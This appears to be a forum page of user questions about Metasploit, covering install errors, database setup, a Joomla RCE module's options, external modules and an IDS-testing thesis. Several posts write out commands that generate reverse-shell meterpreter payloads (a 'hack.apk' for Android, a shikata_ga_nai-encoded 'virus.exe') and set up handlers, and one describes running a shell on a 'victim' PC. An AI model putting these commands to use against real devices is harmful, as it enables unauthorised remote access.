Search the Community

First thing first (1) Opening Terminal and typing following command:- "msfconsole" and getting this output:- so i ran that command in terminal did't worked out now after googling for 3 hrs i found many things which are here 1). i should run "bundle install" in this directory /usr/share/metasploit-framework after that i'm getting this error Now again after doing research i found that i've to update jason so ran following command "gem install json -v1.8.3" which gave me output as:- Please guys help me out here i can't open msfconsole.!😥

So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did copy and paste. And put it on pastebin, so heres the link hopefully one of you can help me i would also like to say the the target pc had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local ip. That link shows the whole process of setting up the payload and handler thats what all i did. Thanks to everyone who takes the time to read this i really need help.

Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with „msfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf' Geben Sie das Passwort der neuen Rolle ein: Geben Sie es noch einmal ein: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for #<Bundler::Settings:0x0000564cdb9a7b70> Did you mean? with_options /usr/share/metasploit-framework/Rakefile:18:in `rescue in <top (required)>' /usr/share/metasploit-framework/Rakefile:12:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' Caused by: LoadError: cannot load such file -- rspec/core /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require' /usr/share/metasploit-framework/Rakefile:13:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' (See full trace by running task with --trace) Also when I start msfconsole there appears an error : root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated When I type db_status in msfconsole it says it is connected, but when i search for something it says that the cache is not build yet. Anyone got a solution for this ? :/ Thanks in advance

So I was wondering how do you program your own payload/backdoor? I usually use veil-evasion but I wanna learn how to program it my self.

I am trying to exploit the common joomla CMS application. Here is some info on the exploit. https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce To use the exploit in msfconsole type : use exploit/multi/http/joomla_http_header_rce So here comes my question. In the options for the exploit comes my problem show options ​###output below### Name Current Setting Required Description ---- --------------- -------- ----------- HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 1.2.3.4 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the Joomla application VHOST no HTTP server virtual host My problem is the VHOST setting.I do under stand what virtual host is( I think it is when one ip is used to host multiple domain names) Imagine this scenario: target website running joomla is http://www.joomla-target.com/joomla/ on port 80 domain is hosted on 1.2.3.4 but 1.2.3.4:80 is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding) I hope you have understood the scenario: So what will be the options for RHOST TARGETURI VHOST RPORT Please help. Thanks in advance.

I was having firewall issues. I remembered seeing problem like this addressed in a segment of Metasploit Minute I wanted to try windows/meterpreter/reverse_hop_http I set the payload to talk to hop.php that I installed on my local machine. That part I'm pretty sure works. I'm not sure what options I didn't set right for the handler but it's wanting to stage to example.com rather than the IP I set. I know I'm missing an option but I'm not sure where to set it. Edit: No idea what I was thinking there. use exploit/multi/handler set HOPURL http://192.168.0.184/hop.php set payload windows/meterpreter/reverse_hop_http exploit -j Second try. Nailed it.

I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link:https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after i reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and i just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possible think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit??

Hello, First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kali To put it in the simplest terms, I was creating a payload for android, and I was wondering, how do i know what LPORT to use. for my first try i tried 446 with the following command : msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk and it returned an error that i cant specify exactly(because i dont remember) but to paraphrase it was something along the lines of : invalid LPORT option than i switched it too msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk and for some reason that i cant understand port 443 worked. so back to my question.... How do i know what LPORT to use when creating a payload? msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf

Hi guys, I am writing a graduation work at the university. Here is the main idea: I need to write a programm that will alow me to do attack modelling for IDS testing. So, let's suppose, I know target OS, open ports and running services (by running nmap, for exaple). Now I'd like to filter exploits (by ports, OS, etc) from Metasploit, that I might use. But I don't know how to do this. Can I make a request to postgresql DB, or exploits don't store there? Or should I use msfconsole instead? I need to write a programm, that would do this automatically taking as input Nmap scan result. For example, in Armitage there is a function Find Atacks. It does what I want, but I need to write something similar by myself. Next step is splitting these exploits by groups and building an attack tree or attack scenarios. After that the programm should run exploits and define, whether they were successfull or not. So, please, help me, if you know answer to one of my quistions. Maybe there is some API for Metasploit, for example for C or Java, it would be much easier to write such programm. Thanks a lot.

Hey guys, So i have a little problem which i do not know how to solve. The problem is that when i encode my payload with x86/shikata_ga_nai and i try it on my windows pc it says it cannot run on the os this is what i typed msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe did i do something wrong , i tested it on win 8 , win 7 and win xp and it says cannot open on every system :( Does someone know the solution Thank you,